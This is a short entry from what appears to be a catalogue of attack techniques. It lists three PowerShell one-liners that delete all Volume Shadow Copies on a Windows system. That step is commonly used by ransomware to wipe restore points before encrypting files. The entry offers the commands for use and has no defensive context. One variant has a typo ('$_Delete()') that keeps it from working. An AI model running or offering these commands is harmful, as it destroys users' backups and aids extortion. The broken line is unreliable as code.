Windows PowerShell / Volume Shadow Copy Service (VSC,VSS) Deletion

Author hackeT
Platform Windows
Language PowerShell
Technique Volume Shadow Copy Service (VSC,VSS) Deletion

Code

Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }
Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
Get-WmiObject Win32_ShadowCopy | Remove-WmiObject

Created

February 24, 2022

Last Revised

April 22, 2024